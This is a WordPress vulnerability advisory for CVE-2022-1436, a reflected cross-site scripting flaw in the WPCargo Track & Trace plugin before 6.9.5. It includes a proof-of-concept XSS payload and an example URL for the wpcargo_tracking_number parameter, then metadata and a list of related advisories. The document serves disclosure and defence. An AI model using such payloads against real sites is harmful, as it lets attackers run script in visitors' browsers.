WPCargo Track & Trace < 6.9.5 – Reflected Cross Site Scripting | CVE 2022-1436 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the wpcargo_tracking_number parameter before outputting it back in the page, which could allow attackers to perform reflected Cross-Site Scripting attacks.

Proof of Concept

On a page using the [wpcargo_trackform] shortcode, append the following parameter and payload: wpcargo_tracking_number=%22%3E%3Csvg/onload=alert(/xss/)%3E

e.g: https://example.com/page-with-shortcode/?wpcargo_tracking_number=%22%3E%3Csvg/onload=alert(/xss/)%3E

Affects Plugins

Fixed in 6.9.5

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Raul

Submitter

Raul

Verified

Yes

WPVDB ID

d5c6f894-6ad1-46f4-bd77-17ad9234cfc3

Timeline

Publicly Published

2022-04-25 (about 2 years ago)

Added

2022-04-25 (about 2 years ago)

Last Updated

2023-02-05 (about 1 years ago)

Other

Published

Title

Published

2023-02-14

Title

Opt-Out for Google Analytics < 2.3.5 - Admin+ Stored XSS

Published

2023-10-18

Title

Ebook Store <= 5.785 - Reflected XSS

Published

2023-08-14

Title

a3 Portfolio < 3.1.1 - Author+ Stored XSS

Published

2014-08-01

Title

WordPress-to-Lead for Salesforce CRM 1.0.1 - salesforce.php salesforce_form_shortcode Function Error Message H&ling XSS

Published

2023-06-26

Title

NEX-Forms < 8.4.4 - Authenticated Stored XSS